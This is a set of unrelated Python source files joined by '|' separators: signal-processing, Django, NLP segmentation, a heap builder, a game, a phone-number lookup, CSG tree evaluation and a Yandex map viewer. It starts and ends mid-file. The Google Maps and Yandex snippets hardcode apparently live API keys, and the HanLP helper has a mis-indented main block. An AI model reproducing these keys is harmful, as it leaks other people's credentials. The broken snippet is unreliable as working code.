            plt.gca().xaxis.set_major_locator(plt.NullLocator())
            plt.gca().yaxis.set_major_locator(plt.NullLocator())
            plt.savefig("../classes/"+classe+'/spectro/'+str(nb_img)+".png",frameon='false')
            plt.show()
            plt.close()
            # Three augmented variants per spectrogram.
            for i in range(3):
                plt.figure()
                plt.imshow(spec_augment(10*np.log(s)),aspect= 'auto')
                plt.gca().set_axis_off()
                plt.subplots_adjust(top = 1, bottom = 0, right = 1, left = 0,
                    hspace = 0, wspace = 0)
                plt.margins(0,0)
                plt.gca().xaxis.set_major_locator(plt.NullLocator())
                plt.gca().yaxis.set_major_locator(plt.NullLocator())
                plt.savefig("../classes/"+classe+'/spectro/augment/'+str(nb_img)+"_"+str(i)+".png",frameon='false')
                plt.close()
        except Exception as e :
            # Best-effort per file: log the error and continue with the next one.
            print(e)
"""f, t, s = signal.spectrogram(ts, fs,noverlap=128 )
plt.pcolormesh(t, f, 10*np.log(s), shading='gist_earth')
plt.gca().set_axis_off()
plt.subplots_adjust(top = 1, bottom = 0, right = 1, left = 0,
hspace = 0, wspace = 0)
plt.margins(0,0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.show()
u, s, vh = np.linalg.svd( 10*np.log(s), full_matrices=True)
smat = np.diag(s)
for i in range(np.shape(smat)[1]) :
    matr = np.dot(np.array(u[:len(s)-1,i] * smat[0,0]).reshape(-1,1), np.reshape(vh[i,:len(s)-1],(1,-1)))
    print(np.shape(matr))
    plt.pcolormesh(np.transpose(matr), shading='gist_earth')
    plt.colorbar()
    plt.show(block=True)
    plt.specgram(matr, Fs=fs)"""
|
#anagram is where both the strings have each characters of the same frequency
#danger and garden is an example of an anagram
def isanagram(s1, s2):
    """Return True when s1 and s2 are anagrams of each other.

    Two strings are anagrams when every character occurs the same number of
    times in both (e.g. "danger" / "garden"). Comparison is case-sensitive.
    """
    from collections import Counter
    # Cheap early exit: different lengths can never be anagrams.
    if len(s1) != len(s2):
        return False
    # Counter builds the char -> frequency map the original maintained by hand
    # with two dicts; equality compares keys and counts in one step.
    return Counter(s1) == Counter(s2)
# CLI driver: read two strings from stdin and report whether they are anagrams.
s1 = input("Enter a string\n")
s2 = input("Enter second string\n")
if isanagram(s1,s2):
    print(f"\nThe {s1} and {s2} are Anagrams")
else:
    print(f"{s1} and {s2} are not anagram")
import sys
import h5py
import numpy as np
pathtocossio = "/Users/daviddesancho/Research/code/smFSmodels"
sys.path.append(pathtocossio)
from smfsmodels import cossio
def cossio_runner(inp):
    """Run one Brownian-dynamics simulation of the Cossio smFS model and
    dump the (time, x, q) trajectory to an HDF5 file.

    inp: sequence (barrier height, linker stiffness kl, D-scale, numsteps).
    Returns the path of the written HDF5 file.
    """
    # Fresh RNG state per call so parallel workers do not share seeds.
    np.random.seed()
    b = inp[0]
    kl = inp[1]
    sc = inp[2]
    numsteps = inp[3]
    dt = 5e-4
    Dx = 1
    # Measuring-device diffusion coefficient, scaled relative to Dx.
    Dq = sc*Dx
    # Initial positions for molecular (x) and measured (q) coordinates;
    # q is unused here — run_brownian takes only x0.
    x, q = [5., 5.]
    # fwrite = one output frame per unit time.
    tt, xk, qk = cossio.run_brownian(x0=x, barrier=b, kl=kl, \
            Dx=Dx, Dq=Dq, numsteps=numsteps, \
            fwrite=int(1./dt))
    data = np.column_stack((tt,xk,qk))
    h5file = "data/cossio_barrier%g_kl%g_Dx%g_Dq%g.h5"%(b, kl, Dx, Dq)
    with h5py.File(h5file, "w") as hf:
        hf.create_dataset("data", data=data)
    return h5file
|
# Generated by Django 2.0.3 on 2018-11-05 07:51
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a ``price`` FloatField (default 0) to every menu-item model."""
    dependencies = [
        ('orders', '0002_auto_20181105_0735'),
    ]
    operations = [
        migrations.AddField(
            model_name='pasta',
            name='price',
            field=models.FloatField(default=0),
        ),
        migrations.AddField(
            model_name='pizza',
            name='price',
            field=models.FloatField(default=0),
        ),
        migrations.AddField(
            model_name='platter',
            name='price',
            field=models.FloatField(default=0),
        ),
        migrations.AddField(
            model_name='salad',
            name='price',
            field=models.FloatField(default=0),
        ),
        migrations.AddField(
            model_name='sub',
            name='price',
            field=models.FloatField(default=0),
        ),
        migrations.AddField(
            model_name='subextra',
            name='price',
            field=models.FloatField(default=0),
        ),
    ]
|
#!/usr/bin/env python
#-*-coding:utf-8-*-
# @File:helper.py
# @Author: Michael.liu
# @Date:2020/5/12 14:58
# @Desc: this code is ....
import codecs
import os
from pyhanlp import *
import xml.etree.ElementTree as ET
content_list = []
def read_file_list(inpufile,seg):
    """Walk each sub-directory of `inpufile`, parse every XML file in it, and
    append "title<seg>body" strings to the module-level `content_list`.

    `seg` is the separator character inserted between title and body.
    """
    dir_list = []
    file_list = []
    root = os.path.abspath(inpufile)
    print(root)
    dir_list = os.listdir(inpufile)
    for dir in dir_list:
        file_root = os.path.join(root + os.path.sep + dir)
        file_list = os.listdir(file_root)
        print(file_list)
        for i in file_list:
            filepath = os.path.join(file_root+os.path.sep+i)
            # Each XML document is expected to have <title> and <body> children.
            xml_root = ET.parse(filepath).getroot()
            title = xml_root.find('title').text
            body = xml_root.find('body').text
            content = title + seg + body  # join title and body with the separator
            content_list.append(content)
def is_number(s):
    """Return True when ``s`` parses as a float, False otherwise."""
    try:
        float(s)
    except ValueError:
        return False
    return True
def new_seg(content,stop_words):
    """Segment `content` with HanLP and return the kept tokens joined by spaces.

    Tokens are lower-cased and stripped; newlines, single characters, empty
    strings, stop words and pure numbers are discarded.
    """
    HanLP = SafeJClass('com.hankcs.hanlp.HanLP')
    ret = []
    seg_list = HanLP.segment(content)
    for term in seg_list:
        word = str(term.word)
        # NOTE(review): the previous line is redundant — this one overwrites it.
        word = str(term.word).strip().lower()
        if word == '\r' or word == '\r\n' or word =='\n' or len(word) <=1:
            continue
        if word != '' and word not in stop_words and not is_number(word):
            ret.append(word)
    seg_content = ' '.join(ret)
    return seg_content
def load_d_cut(content_list, out_file):
    """Segment every document in `content_list` and write one segmented line
    per document to `out_file` (UTF-8).

    Stop words are loaded from ./stop_words.txt.
    """
    # Bug fix: both file handles were previously opened without being
    # reliably closed (the stop-word handle was never closed at all);
    # 'with' guarantees closure even when new_seg raises.
    with open('./stop_words.txt', 'r', encoding='utf-8') as f:
        stop_words = set(f.read().split('\n'))
    with codecs.open(out_file, 'w', encoding='utf-8') as fw:
        for item in content_list:
            seg_content = new_seg(item, stop_words)
            fw.write(str(seg_content))
            fw.write("\n")
if __name__ == "__main__":
print("......start.....")
file_path = "../../data/chapter2/"
read_file_list(file_path,'↑')
load_d_cut(content_list,'./title_content_seg.txt')
print("......finished!.......")
#load_d_cut("","./outfile.csv") |
import random
#Humans choice==================
def inputOfChoice():
    """Prompt the human player for a move and store it in the module-level
    `choiceOfUser` (Python 2: raw_input). The input is not normalised, so the
    comparisons elsewhere expect lowercase."""
    global choiceOfUser
    choiceOfUser = raw_input("Rock, Paper, or Scissors: ")
    return choiceOfUser
#Computers choice==================
def inputOfComputer():
    """Pick the computer's move uniformly at random, store it in the
    module-level `choiceOfComputer`, and return it."""
    global choiceOfComputer
    num = random.randint(1, 3)
    if num == 1:
        choiceOfComputer = "rock"
    elif num == 2:
        choiceOfComputer = "paper"
    else:
        # Bug fix: was "Scissors" (capitalized), which never matched the
        # lowercase comparisons in whoIsTheWinner and always scored a "tie".
        choiceOfComputer = "scissors"
    return choiceOfComputer
#Figures out who is the winner==================
def whoIsTheWinner(user, computer):
    """Print the outcome of one rock-paper-scissors round.

    `user` and `computer` are expected to be lowercase move names; anything
    unrecognised on the computer side falls through to "tie".
    Uses print() calls so the code runs under both Python 2 and 3 (the
    original used Python-2-only print statements).
    """
    comWin = "Computer Wins"
    useWin = "User Wins"
    if user == "rock":
        if computer == "paper":
            print(comWin)
        elif computer == "scissors":
            print(useWin)
        else:
            print("tie")
    elif user == "paper":
        if computer == "scissors":
            print(comWin)
        elif computer == "rock":
            print(useWin)
        else:
            print("tie")
    elif user == "scissors":
        if computer == "rock":
            print(comWin)
        elif computer == "paper":
            # Bug fix: this branch previously did `return useWin` instead of
            # printing, so a scissors-vs-paper win produced no output.
            print(useWin)
        else:
            print("tie")
#Main fucntion of file==================
def main():
    """Ask whether to play again; on "yes", run one more round and recurse.

    NOTE(review): replay is implemented by recursion, so a very long session
    could hit the recursion limit — confirm whether a loop is preferred.
    """
    global playAgain
    playAgain = raw_input("Again? ")
    if playAgain == "yes":
        inputOfChoice()
        inputOfComputer()
        whoIsTheWinner(choiceOfUser, choiceOfComputer)
        main()
# Play the first round immediately, then hand control to the replay prompt.
inputOfChoice()
inputOfComputer()
whoIsTheWinner(choiceOfUser, choiceOfComputer)
main()
|
#!/usr/bin/python3
import phonenumbers
from phonenumbers.timezone import time_zones_for_number
from phonenumbers import geocoder
from phonenumbers import carrier
from clint.textui import colored
def location(phone_number):
    """Print country, first time zone and carrier for `phone_number`, and
    append the same details to output/location_operator.txt.

    The number is parsed with region hint "EN"; results are best-effort
    (empty strings when the libraries have no data).
    """
    number=phonenumbers.parse(phone_number,"EN")
    liste=time_zones_for_number(number)
    country=geocoder.description_for_number(number, "en")
    operator=carrier.name_for_number(number,"en")
    print(colored.green("[+]Country:"+str(country)))
    # Only the first reported time zone is shown/logged.
    print(colored.green("[+]Time Zone:"+str(liste[0])))
    print(colored.green("[+]Carrier:"+str(operator)))
    with open("output/location_operator.txt","a+") as file:
        file.write("\n[+]Country:\n"+str(country)+"\n[+]Time Zone:\n"+str(liste[0])+"\n[+]Carrier:\n"+str(operator)+"\n--------------------------------------------------------------")
|
# python3
def parent(i):
    """Index of the parent of node i in a 0-based binary heap.

    Bug fix: was ``i / 2`` — float division under Python 3, and the wrong
    formula for 0-based heaps (left = 2i+1 / right = 2i+2 implies
    parent = (i-1)//2).  Note: `parent` is not referenced elsewhere in this
    file, so no caller behavior changes.
    """
    return (i - 1) // 2
def left(i):
    """Index of the left child of node i."""
    return (2 * i) + 1
def right(i):
    """Index of the right child of node i."""
    return (2 * i) + 2
def valid_edge(data, i, child_idx):
    """True when the heap edge from i to its child (selected by ``child_idx``,
    i.e. `left` or `right`) needs no fixing: either endpoint is out of range,
    or the min-heap order data[i] <= data[child] already holds."""
    return i >= len(data) or child_idx(i) >= len(data) or data[i] <= data[child_idx(i)]
def swap(data, i, j):
    """Exchange the elements at indices i and j of ``data`` in place."""
    data[i], data[j] = data[j], data[i]
def fixMinHeap(swaps, data, i):
    """Swap data[i] with its smaller child, record the swap, and return the
    index the element moved to.

    Called from siftdown() only when a heap edge at i is violated, so in that
    context minidx != i; if called with no violation it would record a no-op
    (i, i) swap.
    """
    minidx = i
    if left(i) < len(data) and data[left(i)] < data[minidx]:
        minidx = left(i)
    if right(i) < len(data) and data[right(i)] < data[minidx]:
        minidx = right(i)
    swaps.append((i, minidx))
    swap(data, i, minidx)
    return minidx
def siftdown(swaps, data, i):
    """Recursively sift data[i] down until both child edges satisfy the
    min-heap property, appending every swap performed to ``swaps``."""
    if not ( valid_edge(data, i, left) and valid_edge(data, i, right) ):
        siftdown(swaps, data, fixMinHeap(swaps, data, i))
def build_heap_optimized(data):
    """Heapify ``data`` in place in O(n) by sifting down every internal node,
    from the middle of the array back to the root.

    Returns the list of (i, j) swaps performed.
    """
    swaps = []
    # int(len/2) is a safe starting point: every index past it is a leaf.
    for i in range(int(len(data) / 2), -1, -1):
        siftdown(swaps, data, i)
    return swaps
def build_heap_naive(data):
    """Turn ``data`` into a (sorted, hence valid min-) heap in place using
    selection sort, recording every swap.

    Returns the list of (i, j) index pairs swapped — worst case O(n^2) of them,
    which is why build_heap_optimized exists.
    """
    recorded = []
    size = len(data)
    for front in range(size):
        for probe in range(front + 1, size):
            if data[front] > data[probe]:
                recorded.append((front, probe))
                data[front], data[probe] = data[probe], data[front]
    return recorded
def main():
    """Read n and n integers from stdin, heapify, and print the swap count
    followed by one "i j" pair per line."""
    n = int(input())
    data = list(map(int, input().split()))
    assert len(data) == n
    swaps = build_heap_optimized(data)
    print(len(swaps))
    for i, j in swaps:
        print(i, j)
if __name__ == "__main__":
    main()
|
from django.urls import path
from . import views
app_name="payment"
urlpatterns = [
path('card/',views.add_cart,name='card'),
path('add_coupon/',views.add_coupon,name='add_coupon'),
path('remove_item/',views.remove_item,name='remove_item'),
path('callback/',views.callback,name='callback'),
path('create_package/', views.create_packages,name='create_package'),
path('havale/',views.havale,name ="havale"),
] |
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
"""
import logging
log = logging.getLogger(__name__)
import numpy as np
from node import Node, root0, root1, root2, root3, root4, UNION, INTERSECTION, DIFFERENCE, BOX, SPHERE, EMPTY, desc
from ctrl import CtrlLeft, CtrlRight, CtrlResumeFromLeft, CtrlResumeFromRight, CtrlReturn, CtrlBreak, desc_ctrl
def fake_pfx(ctrl):
    """Map a ctrl bitmask to the short prefix used in the fake calc trace
    strings: "" (both sides), "L"/"R" (one side), "RL"/"RR" (resume), or the
    full desc_ctrl() dump for anything else."""
    if (ctrl & CtrlLeft) and (ctrl & CtrlRight):
        return ""
    if ctrl & CtrlLeft:
        return "L"
    if ctrl & CtrlRight:
        return "R"
    if ctrl & CtrlResumeFromLeft:
        return "RL"
    if ctrl & CtrlResumeFromRight:
        return "RR"
    return desc_ctrl(ctrl)
def fake_ctrl(p):
    """Consume a one-shot "LoopL" marker on node p.

    Returns CtrlLeft (forcing a left-subtree reiteration) the first time a
    labelled node is seen — the attribute is deleted so the loop happens
    exactly once — and CtrlReturn otherwise.
    """
    if hasattr(p, "LoopL"):
        log.info("fake_ctrl found node with LoopL %r " % p )
        delattr(p, "LoopL")
        ctrl = CtrlLeft
    else:
        ctrl = CtrlReturn
    pass
    return ctrl
def fake_binary_calc(node, left=None, right=None, ctrl=None):
    """Build the trace string for an operator node from its two child results.

    NOTE(review): `assert left and right` also rejects falsy-but-valid values
    such as "" — the child calcs here always return non-empty strings.
    """
    assert hasattr(node,'depth')
    assert left and right, (left, right)
    return "%s:[%s;%s](%s,%s)" % ( fake_pfx(ctrl),node.idx, node.depth, left, right )
def fake_primitive_calc(node, ctrl=None):
    """Build the trace string for a leaf node: "<pfx>:<idx>;<depth>"."""
    return "%s:%s;%s" % (fake_pfx(ctrl),node.idx, node.depth )
def postordereval_i2t(root, debug=0):
    """
    Iterative binary tree evaluation, using postorder threading to avoid
    the stack manipulations of _i2 that repeatly "discover" the postorder.
    However intermediate evaluation steps still require
    lhs and rhs stacks, that grow to a maximum of one less than the tree height.
    ie the stacks are small

    * NB this assumes a COMPLETE BINARY TREE, ie every node above the leaves has
      non None left and right children, and leaves have left and right None

    * note that the postorder traversal is operator only starting from bottom left
      with bileaf nodes at lowest level, ie operator nodes with left and right
      primitives

    * NB initial traverse always starts on a bileaf operator
      so p.l and p.r are leaves and lhs/rhs stacks will be appended
      before reaching operator where they will be popped

    * non-bileaf LoopL/R forces reiteration of left/right subtree,
      so push er/el onto rhs/lhs stack, as was just popped but the
      so will return to same position after the reiteration

    * non-bileaf LoopL/R just popped lhs and rhs, but looping means reiterating
      while leaving the other side unchanged, so must push to opposite side
      so when resume after the reiteration are back to the same other side state
      as before it

    * bileaf loopers with p.l or p.r leaves just
      go for an immediate while loop spin repeating one side
      primitive_calc with different act, they do not tee up tranches

    * non-bileaf loopers have to tee up pair of tranches to repeat the loopside subtree
      and then resume from where left off

    Three while loop structure

    * begin/end tranches
    * postorder operator nodes between begin and end
    * act controlled inner loop, repeats calc for immediate (bileaf) loopers
    """
    leftop = Node.leftmost(root)
    assert leftop.is_bileaf
    assert not leftop.is_primitive
    assert leftop.next_ is not None, "threaded postorder requires Node.postorder_threading_r "
    # NOTE(review): this clobbers the `debug` parameter — confirm intentional.
    debug = 1
    lhs = []
    rhs = []
    tranche = []
    # A tranche is [begin, end, ctrl]: a run of the threaded postorder to evaluate.
    tranche.append([leftop,None,CtrlLeft|CtrlRight])
    while len(tranche) > 0:
        begin, end, ctrl = tranche.pop()
        #print "start tranche %s begin %s end %s " % (desc_ctrl(ctrl), begin, end)
        if debug > 3:
            p = begin
            while p is not end:
                print "pre-traverse ", p
                p = p.next_
            pass
        pass
        p = begin
        # Walk the threaded postorder of operator nodes for this tranche.
        while p is not end:
            #ctrl = ctrl & ~CtrlReturn
            ctrl = (CtrlLeft|CtrlRight)
            #print "p loop %s : %s " % (desc_ctrl(ctrl), p)
            # Inner loop: repeats the calc immediately for bileaf loopers.
            while ctrl & (CtrlLeft | CtrlRight ):
                if ctrl & CtrlLeft:
                    if p.l.is_leaf:
                        el = fake_primitive_calc(p.l,ctrl=ctrl)
                        assert el
                    else:
                        # Non-leaf left result was stacked by an earlier tranche.
                        el = lhs.pop()
                    pass
                pass
                if ctrl & CtrlRight:
                    if p.r.is_leaf:
                        er = fake_primitive_calc(p.r,ctrl=ctrl)
                        assert er
                    else:
                        er = rhs.pop()
                    pass
                pass
                ep = fake_binary_calc(p,el,er,ctrl=ctrl)
                ctrl = fake_ctrl(p)
                if ctrl & CtrlLeft:
                    if not p.l.is_leaf:
                        # Non-bileaf looper: preserve the other side's result and
                        # tee up (resume-at-p, reiterate-left-subtree) tranches.
                        rhs.append(er)
                        tranche.append([p,None,CtrlResumeFromLeft])
                        tranche.append([Node.leftmost(p.l),p.l.next_,CtrlLeft])
                        ctrl |= CtrlBreak
                    pass
                pass
                if ctrl & CtrlRight:
                    if not p.r.is_leaf:
                        lhs.append(el)
                        tranche.append([p,None,CtrlResumeFromRight])
                        tranche.append([Node.leftmost(p.r),p.r.next_,CtrlRight])
                        ctrl |= CtrlBreak
                    pass
                pass
                if ctrl & CtrlBreak:
                    break
                pass
            pass
            if ctrl & CtrlBreak:
                # Abandon this tranche; the reiteration tranches run next.
                ctrl = ctrl & ~CtrlBreak
                if debug > 0:
                    log.info("_i2t post ctrl-while (after scrubbed CtrlBreak): %s " % desc_ctrl(ctrl))
                break
            pass
            # Hand the finished result up to the parent via the side stacks.
            if p.is_left:
                lhs.append(ep)
            else:
                rhs.append(ep)
            pass
            p = p.next_
        pass
    pass
    assert len(lhs) == 0, lhs
    assert len(rhs) == 1, rhs # end with p.idx = 1 for the root
    return rhs[0]
def postordereval_r(p, ctrl=CtrlLeft|CtrlRight, debug=0):
    """
    * CtrlLeft CtrlRight distinction only has teeth at
      the single recursion level, the ctrl is passed to
      other levels for tree annotation purposes but its
      power is removed at the sub-levels via ctrl|CtrlBoth

    * note that when a CtrlLeft or CtrlRight is raised the
      current node and its subtree gets repeated
    """
    assert p
    el, er, ep = None, None, None
    # NOTE(review): clobbers the `debug` parameter — confirm intentional.
    debug = 0
    # xctrl tracks how this node was (re)entered, for trace labelling only.
    xctrl = ctrl
    loopcount = 0
    while ctrl & (CtrlLeft | CtrlRight):
        loopcount += 1
        # Guard against runaway reiteration from fake_ctrl.
        assert loopcount < 10
        if ctrl & CtrlLeft:
            if p.l.is_leaf:
                el = fake_primitive_calc(p.l, ctrl=ctrl)
            else:
                el = postordereval_r(p.l, ctrl=ctrl|CtrlRight, debug=debug)
            pass
        pass
        if ctrl & CtrlRight:
            if p.r.is_leaf:
                er = fake_primitive_calc(p.r, ctrl=ctrl)
            else:
                er = postordereval_r(p.r, ctrl=ctrl|CtrlLeft, debug=debug)
            pass
        pass
        ep = fake_binary_calc(p, el, er, xctrl)
        ctrl = fake_ctrl(p)
        # Record which side forced the repeat so the next calc is labelled RL/RR.
        if ctrl & CtrlLeft:
            xctrl = CtrlResumeFromLeft
        elif ctrl & CtrlRight:
            xctrl = CtrlResumeFromRight
        else:
            xctrl = ctrl
        pass
    pass
    assert ep
    return ep
if __name__ == '__main__':
    logformat = "%(asctime)s %(name)s %(levelname)-8s %(message)s"
    logging.basicConfig(level=logging.INFO,format=logformat)
    root = root2
    root.tree_labelling()
    Node.dress(root)
    # Run both evaluators and assert they produce the same trace string.
    ret0 = None
    fns = [postordereval_r,postordereval_i2t]
    for fn in fns:
        Node.label_r(root, 2, "LoopL") # label is popped, so relabel for each imp
        ret = fn(root, debug=0)
        print "%20s : %s " % ( fn.__name__, ret )
        if ret0 is None:
            ret0 = ret
        else:
            assert ret == ret0, (ret, ret0)
        pass
    pass
## MOVE THIS FILE OFF GITHUB REPO BEFORE SYNCING!
# SECURITY: a live API key is hardcoded and committed to source control.
# Revoke/rotate this key and load it from an environment variable or an
# untracked config file instead.
# NOTE(review): the key string ends with a trailing space — confirm intentional.
import googlemaps
api_key = "AIzaSyBYl6LkkHOIfBCSzRpMcptBiEArCDKwq7g "
gmaps = googlemaps.Client(api_key)
from advection_diffusion import discretize_nonlinear_instationary_advection_diffusion_fv
|
'''
при проверке pgup/pgdn проверьте что не изменяете текст или комбобокс
'''
import sys, math
import requests
from PyQt5 import QtGui
from PyQt5 import QtWidgets
from PyQt5 import uic
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QApplication
Ui_MainWindown, _ = uic.loadUiType('uis/untitled.ui')
# -------- constants
static_server = 'https://static-maps.yandex.ru/1.x/'  # Yandex static map renderer
# SECURITY: hardcoded API key in source — move to config/env and rotate.
geocode_key = "40d1649f-0493-4b70-98ba-98533de7710b"
geocode_server = "https://geocode-maps.yandex.ru/1.x/"  # Yandex geocoder endpoint
# Map layer types offered in the combo box (presumably indexed by self.li).
l = ['map', 'sat', 'sat,skl']
# ---------/constants
class Dot:
    """A coordinate pair used as a map point.

    Constructed either from two floats (Dot(a, b)) or from a single
    space-separated string (Dot("a b")).
    """
    def __init__(self, *args):
        if args[0].__class__.__name__ == 'float':
            self.a, self.b = args[:2]
        else:
            self.a, self.b = map(float, args[0].split())
    def __str__(self):
        # "a,b" — the comma-separated form expected by the static-maps API.
        return f'{self.a},{self.b}'
    def __sub__(self, other):
        # NOTE(review): stub — only prints and returns None; confirm intent.
        print(self, other)
    def __iadd__(self, other):
        """Shift by (da, db); each coordinate is wrapped back into [0, 180]."""
        self.a += other[0]
        self.b += other[1]
        if not (0 <= self.a <= 180):
            self.a = (self.a + 180) % 180
        if not (0 <= self.b <= 180):
            # Bug fix: the wrapped value was previously assigned to self.a,
            # clobbering it and leaving self.b out of range.
            self.b = (self.b + 180) % 180
        return self
    def pt(self):
        # Marker spec ("pmwts" style) for the static-maps 'pt' parameter.
        return f'{self.a},{self.b},pmwts'
    def __repr__(self):
        return f'{self.a} {self.b}'
    def __copy__(self):
        # Round-trips through the "a b" string form accepted by __init__.
        return Dot(self.__repr__())
class Ui_MainWindow(Ui_MainWindown, QtWidgets.QMainWindow):
    """Map viewer window: shows a Yandex static-map image and supports
    address search, dropping markers with the mouse, and pan/zoom keys."""

    def init2(self):
        # Second-stage initialisation, called by the caller after setupUi():
        # wires the widgets and fetches the first map image.
        self.comboBox.addItems(l)  # layer choices: map / sat / sat,skl
        self.li = 2
        self.dots = []  # markers currently drawn on the map
        self.spn = 0.01  # visible span in degrees (controls zoom)
        self.z = 15  # tile zoom level, used for pixel->degree conversion
        self.maindot = Dot(55.94386499259262, 54.726269546473326)  # map centre
        self.get_img()
        self.pushButton.clicked.connect(self.get_img)
        self.pushButton_find.clicked.connect(self.find_pos)
        self.pushButton_clear.clicked.connect(self.clear_dots)
        self.checkBox.clicked.connect(self.find_pos)

    def clear_dots(self):
        # Remove every marker and the address text, then redraw the map.
        self.dots.clear()
        self.adres.setText('')
        self.get_img()

    def find_pos(self):
        # If there is a text query: geocode it, recentre the map on the
        # result and append it as a marker.  Then re-resolve the address of
        # every marker and rebuild the address panel, finally redrawing.
        if self.textEdit.toPlainText():
            params = {
                'apikey': geocode_key,
                "geocode": self.textEdit.toPlainText() if self.textEdit.toPlainText() else self.dots[0].__str__(),
                "format": "json"
            }
            # First geocoder hit for the query.
            response = \
                requests.get(geocode_server, params=params).json()['response']['GeoObjectCollection']['featureMember'][
                    0]
            self.maindot = Dot(
                response['GeoObject']['Point']['pos'])
            self.dots.append(self.maindot.__copy__())
            self.adres.setText('')
            self.textEdit.setText('')
        for dot in self.dots:
            params = {
                'apikey': geocode_key,
                "geocode": dot.__str__(),
                "format": "json"
            }
            response = \
                requests.get(geocode_server, params=params).json()['response']['GeoObjectCollection']['featureMember'][
                    0]
            # Append a "--------" separator, the formatted address and — when
            # the checkbox is on and the geocoder returned one — the postal
            # code for this marker.
            self.adres.setText(
                self.adres.toPlainText() + '\n' + '-' * 8 + "\n" +
                response['GeoObject']['metaDataProperty']['GeocoderMetaData']['Address'][
                    'formatted'] + '\n' +
                response['GeoObject']['metaDataProperty']['GeocoderMetaData']['Address'][
                    'postal_code'] if self.checkBox.isChecked() and 'postal_code' in
                                      response['GeoObject']['metaDataProperty']['GeocoderMetaData'][
                                          'Address'] else
                self.adres.toPlainText() + "\n" + '-' * 8 + "\n" +
                response['GeoObject']['metaDataProperty']['GeocoderMetaData']['Address'][
                    'formatted'])
        self.get_img()

    def mousePressEvent(self, event):
        # Left click: drop a temporary marker at the clicked map position and
        # show its address (the marker is popped again afterwards).
        if (event.button() == Qt.LeftButton):
            pos = (event.x() - 10, event.y() - 10)  # 10px image-widget offset
            if 0 <= pos[0] <= 600 and 0 <= pos[1] <= 450:  # inside 600x450 map
                x = pos[0] - 300  # pixels right of the map centre
                y = -pos[1] + 225  # pixels above the map centre
                # Convert pixel offsets to degrees at the current tile zoom.
                # NOTE(review): the 360/180 factors suggest lon/lat handling —
                # confirm which of self.a/self.b is which axis.
                a, b = self.maindot.a + 360 / (2 ** self.z) * x / 256, self.maindot.b + 180 / (2 ** self.z) * y / 256
                s = Dot(a, b)
                self.dots.append(s)
                self.find_pos()
                self.dots.pop(-1)
        # Right click: same position math, then search the Yandex
        # organization ("biz") API around the point and show the nearest
        # organization's name if it lies within 50 metres.
        if (event.button() == Qt.RightButton):
            pos = (event.x() - 10, event.y() - 10)
            if 0 <= pos[0] <= 600 and 0 <= pos[1] <= 450:
                x = pos[0] - 300
                y = -pos[1] + 225
                a, b = self.maindot.a + 360 / (2 ** self.z) * x / 256, self.maindot.b + 180 / (
                        2 ** self.z) * y / 256
                s = Dot(a, b)
                self.dots.append(s)
                self.find_pos()
                search_api_server = "https://search-maps.yandex.ru/v1/"
                api_key = "7f712159-bb4c-49b3-b690-8108fe1b2898"
                address_ll = str(s)
                params = {
                    'apikey': geocode_key,
                    "geocode": address_ll,
                    "format": "json"
                }
                # Reverse-geocode the click to get a textual address ...
                response = \
                    requests.get(geocode_server, params=params).json()['response']['GeoObjectCollection']
                variants = response[
                    "featureMember"]
                address = variants[0]['GeoObject']['metaDataProperty'][
                    'GeocoderMetaData']['text']
                # ... then search for businesses at that address.
                search_params = {
                    "apikey": api_key,
                    "text": address,
                    "lang": "ru_RU",
                    "ll": address_ll,
                    "type": "biz"
                }
                response = requests.get(search_api_server, params=search_params)
                json_response = response.json()
                # Take the first organization found.
                organization = json_response["features"][0]
                # Organization name.
                org_name = organization["properties"]["CompanyMetaData"]["name"]
                # Organization address (unused below).
                org_address = organization["properties"]["CompanyMetaData"]["address"]
                point = organization["geometry"]["coordinates"]
                s = self.lonlat_distance(point)
                if s <= 50:
                    self.adres.setText(
                        self.adres.toPlainText() + '\n' + '-' * 8 + "\n" + org_name)
                else:
                    self.adres.setText(
                        self.adres.toPlainText() + '\n' + '-' * 8 + "\n" + 'Организаций не найдено')
                self.dots.pop(-1)

    def lonlat_distance(self, point):
        """Approximate distance in metres between the last marker and *point*
        (equirectangular approximation)."""
        degree_to_meters_factor = 111 * 1000  # 111 kilometres in metres
        a_lon, a_lat = self.dots[-1].a, self.dots[-1].b
        b_lon, b_lat = point
        # Take the midpoint latitude and compute its longitude scale factor.
        radians_lattitude = math.radians((a_lat + b_lat) / 2.)
        lat_lon_factor = math.cos(radians_lattitude)
        # Horizontal and vertical offsets in metres.
        dx = abs(a_lon - b_lon) * degree_to_meters_factor * lat_lon_factor
        dy = abs(a_lat - b_lat) * degree_to_meters_factor
        return round(math.sqrt(dx * dx + dy * dy), 4)

    def get_img(self):
        # Download the static-map image for the current centre/span/layer
        # with all markers, save it as img.png and show it in the label.
        params = {
            'l': self.comboBox.currentText(),
            'll': self.maindot.__str__(),
            "spn": f"{self.spn},{self.spn}",
            'pt': '~'.join(map(lambda x: x.pt(), self.dots))
        }
        open('img.png', 'wb').write(requests.get(static_server, params=params).content)
        self.img.setPixmap(QtGui.QPixmap('img.png'))

    def keyPressEvent(self, event: QtGui.QKeyEvent) -> None:
        # PgUp/PgDn zoom out/in (within bounds); arrows pan the map centre.
        if event.key() == Qt.Key_PageUp:
            if self.spn * 2 < 2:
                self.spn *= 2
                self.z -= 1
        elif event.key() == Qt.Key_PageDown:
            if self.spn / 2 > 0.00175:
                self.spn /= 2
                self.z += 1
        elif event.key() == Qt.Key_Left:
            self.maindot += [-self.spn * 2, 0]
        elif event.key() == Qt.Key_Right:
            self.maindot += [self.spn * 2, 0]
        elif event.key() == Qt.Key_Up:
            self.maindot += [0, self.spn]
        elif event.key() == Qt.Key_Down:
            self.maindot += [0, -self.spn]
        self.get_img()
def except_hook(cls, exception, traceback):
    """Delegate uncaught exceptions to the default interpreter hook.

    Installed as ``sys.excepthook`` below so PyQt does not silently swallow
    tracebacks raised inside Qt slots.
    """
    sys.__excepthook__(cls, exception, traceback)
if __name__ == '__main__':
